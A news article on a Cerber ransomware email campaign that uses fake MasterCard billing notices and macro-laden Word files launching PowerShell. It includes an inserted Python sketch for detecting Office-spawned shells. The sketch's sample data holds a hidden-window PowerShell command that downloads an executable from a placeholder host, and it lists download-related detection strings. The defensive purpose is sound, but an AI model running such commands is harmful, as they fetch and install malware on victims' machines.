Apparently the Cerber ransomware gang is ready for the holiday season. The criminals have just launched a brand new spam campaign which uses fake credit card reports to trick users into opening a Word file which will download and install Cerber ransomware.
The new spam campaign was detected by the Microsoft Malware Protection Center, which said that the emails pretend to be notices of pending payments on MasterCard credit cards.
The design of the email is really smart because it plays on everyone’s fear of getting billed for items they haven’t purchased.
The email uses a sense of urgency to trick victims into opening a password-protected Word document that contains instructions on how to cancel this operation.
Most banks send customers password-protected files because email scanning systems and anti-malware products can’t open the email’s attachment to scan it.
The file which customers receive with these emails is a Word document that contains an attached macro script. Once the user allows the script to execute, it will infect the system with the Cerber ransomware.
When opening the Word document, the users see instructions that resemble a Microsoft tech support page, telling the user to Enable Editing, which allows the macro script to execute.
Unlike the tech-savvy users who stay away from Word files with macro scripts, most regular users just see the message and follow the embedded instructions.
As soon as users allow the macro script to execute, the macro runs a PowerShell script that downloads and installs the Cerber ransomware, which immediately starts encrypting the user’s files.
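The Word-to-PowerShell chain described above is visible in process-creation telemetry. The following detection sketch is an added example, not code from Microsoft or any vendor named here; it assumes events carry Sysmon-style fields (`ProcessId`, `ParentProcessId`, `Image`, `CommandLine`), and the sample events, paths and URL are constructed.

```python
import ntpath

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe"}
SHELLS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
DOWNLOAD_HINTS = ("downloadfile", "downloadstring", "invoke-webrequest", "-encodedcommand", "-enc ")

# Constructed sample events (not real telemetry); field names follow Sysmon process creation.
SAMPLE_EVENTS = [
    {"ProcessId": 100, "ParentProcessId": 4, "Image": r"C:\Windows\explorer.exe",
     "CommandLine": "explorer.exe"},
    {"ProcessId": 200, "ParentProcessId": 100, "Image": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "CommandLine": r'WINWORD.EXE "C:\Users\u\Downloads\report.doc"'},
    {"ProcessId": 300, "ParentProcessId": 200, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c powershell ..."},
    {"ProcessId": 400, "ParentProcessId": 300, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -WindowStyle Hidden (New-Object Net.WebClient).DownloadFile('http://example.invalid/a','a.exe')"},
    {"ProcessId": 500, "ParentProcessId": 100, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe Get-Process"},
]

def _name(path):
    return ntpath.basename(path).lower()  # ntpath parses Windows paths on any OS

def office_ancestor(event, by_pid, max_depth=5):
    """Walk up the parent chain and return the Office process found there, or None."""
    pid = event["ParentProcessId"]
    for _ in range(max_depth):
        parent = by_pid.get(pid)
        if parent is None:
            return None
        if _name(parent["Image"]) in OFFICE:
            return parent
        pid = parent["ParentProcessId"]
    return None

def find_macro_shells(events):
    """Return (pid, office_app, child, severity) for script hosts descended from Office."""
    by_pid = {e["ProcessId"]: e for e in events}  # PIDs get reused; real pipelines key on ProcessGuid
    alerts = []
    for e in events:
        if _name(e["Image"]) not in SHELLS:
            continue
        office = office_ancestor(e, by_pid)
        if office is None:
            continue
        cmd = e["CommandLine"].lower()
        severity = "high" if any(h in cmd for h in DOWNLOAD_HINTS) else "medium"
        alerts.append((e["ProcessId"], _name(office["Image"]), _name(e["Image"]), severity))
    return alerts
```

Walking the ancestry rather than checking only the direct parent catches the case where the macro launches `cmd.exe` first and PowerShell second, while the interactive PowerShell session started from Explorer is left alone.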
After seeing a copy of the ransom note, the MalwareHunterTeam stated that the latest version of the Cerber ransomware is currently uncrackable.
So, it’s no wonder that the Cerber gang switched from their classic invoice-themed spam and malvertising campaigns to this fake credit card report.
Some other cybercrime operations have also adopted their tactics and intensified operations for the winter holidays.
According to the Proofpoint team, the activity surrounding the NewPOSthings and ZeusPOS malware families, which target Point-of-Sale terminals, has quadrupled for the Thanksgiving and Black Friday sales.